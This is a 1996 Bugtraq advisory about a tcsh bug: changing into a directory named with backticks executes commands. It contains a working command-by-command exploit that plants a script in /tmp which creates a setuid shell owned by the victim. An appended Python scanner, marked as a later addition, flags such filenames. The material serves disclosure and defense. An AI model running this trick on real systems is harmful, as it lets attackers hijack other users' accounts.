From proff  Sat Sep 14 10:35:41 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id KAA14585 for best-of-security; Sat, 14 Sep 1996 10:35:41 +1000
Received: from brimstone.netspace.org ([128.148.157.143]) by suburbia.net (8.7.4/Proff-950810) with SMTP id HAA01220; Sat, 14 Sep 1996 07:55:32 +1000
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <25471-24839>; Fri, 13 Sep 1996 16:04:25 -0500
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id QAA07987; Fri, 13 Sep 1996 16:06:34 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with
          spool id 398702 for BUGTRAQ@NETSPACE.ORG; Fri, 13 Sep 1996 15:44:57
          -0400
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org
          (8.7/8.6.12) with SMTP id NAA22156 for <BUGTRAQ@NETSPACE.ORG>; Fri,
          13 Sep 1996 13:26:09 -0400
Approved-By: ALEPH1@UNDERGROUND.ORG
Received: from maxx.mc.net (maxx.mc.net [206.138.8.7]) by netspace.org
          (8.7/8.6.12) with ESMTP id KAA31941 for <bugtraq@netspace.org>; Fri,
          13 Sep 1996 10:03:01 -0400
Received: from maxx.mc.net (root@maxx.mc.net [206.138.8.7]) by maxx.mc.net
          (8.7.4/8.6.12) with SMTP id JAA20381 for <bugtraq@netspace.org>; Fri,
          13 Sep 1996 09:03:00 -0500 (CDT)
X-Sender: root@maxx.mc.net
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Approved-By:  test <butafuco@MC.NET>
Message-ID: <Pine.BSI.3.95.960912182823.18594A-100000@maxx.mc.net>
Date: 	Fri, 13 Sep 1996 09:03:00 -0500
Reply-To: test <butafuco@mc.net>
Sender: proff
From: test <butafuco@mc.net>
Subject:      tee see shell problems
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>

A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
out with BSDI anyway) that allows the execution of arbitrary commands
when changing into directories whose names are enclosed in backticks.  The
problem might also prove to be quite bad for tcsh scripts that find
themselves changing into directories on the fly.

Here is probably one of the dumbest methods possible that could be used to
exploit this weakness.

----------------------------Cut to Bad guy--------------------------------

jim% whoami
Evol bad guy
jim% mkdir /tmp/\`source\ .WaReZ\`
jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ
jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ
jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ
jim% chmod +x /tmp/*W*/.WaReZ

---------------------------Cut to unsuspecting foo------------------------

jim% whoami
Unsuspecting foo
jim% echo $SHELL
/bin/tcsh
jim% I just like to check that sometimes.
jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff
jim% cd /tmp
jim% ls

`source .WaReZ`

jim% OH BOY!!! the jack pot!
jim% cd *WaReZ*
jim% ls

jim% oh, oh well maybe I'll check later...
jim% cd $HOME

----------------------------Cut to More Bad guy--------------------------

jim% ls -a /tmp/*W*/

.
..
.24753

jim% /tmp/*W*/.24753
$whoami
unsuspecting foo
$ hah.
---------------------------End Unix Parable-------------------------------
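As an added illustration from the defender's side (this script is not part of the original post; the metacharacter set, the helper names and the sample tree are this example's own choices), here is a small Python check that walks a directory such as /tmp, flags entries whose names carry shell metacharacters like the backticks used above, and shows how a script that must cd into names it did not create should quote them so the shell sees the name literally:

```python
import os
import re
import shlex
import tempfile
from pathlib import Path

# Shell metacharacters that become dangerous if a filename is ever re-parsed
# as shell input (command substitution, expansion, quoting, separators).
# The character set is this example's own choice, not from the original post.
SHELL_META = re.compile(r'[`$;|&<>(){}\\\'"\n\r]')


def is_suspicious_name(name: str) -> bool:
    """True if a single path component carries shell metacharacters."""
    return SHELL_META.search(name) is not None


def scan_tree(top: str):
    """Walk `top` and return [(path, offending_chars)] for every directory or
    file whose name contains shell metacharacters.  A hit is not proof of an
    attack, but it is exactly the kind of entry a shell with the cd bug from
    the post would re-evaluate, so it deserves a look."""
    findings = []
    for root, dirs, files in os.walk(top):
        for name in dirs + files:
            chars = "".join(sorted(set(SHELL_META.findall(name))))
            if chars:
                findings.append((os.path.join(root, name), chars))
    return findings


def safe_cd_argument(name: str) -> str:
    """Quote a path so that it survives one round of shell parsing literally.
    This is the defensive habit for scripts that cd into names they did not
    create: never hand a raw glob or an unquoted expansion to cd."""
    return shlex.quote(name)


def demo():
    """Build a throwaway tree (constructed for this example) and scan it.
    Returns the sorted base names that were flagged."""
    with tempfile.TemporaryDirectory() as tmp:
        os.mkdir(os.path.join(tmp, "`source .WaReZ`"))  # the shape used in the post
        os.mkdir(os.path.join(tmp, "$(id)"))             # constructed variant, same idea
        os.mkdir(os.path.join(tmp, "ordinary_dir"))
        Path(tmp, "notes.txt").write_text("harmless\n")
        hits = scan_tree(tmp)
        return sorted(os.path.basename(p) for p, _ in hits)


if __name__ == "__main__":
    for name in demo():
        print("flagged:", repr(name), "-> safe cd argument:", safe_cd_argument(name))
```

Run it against a real directory with `scan_tree("/tmp")`; anything it flags is worth inspecting before a tcsh user or script changes into it, and the quoted form from `safe_cd_argument` is what a script should pass to cd rather than a bare glob like `*WaReZ*`.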

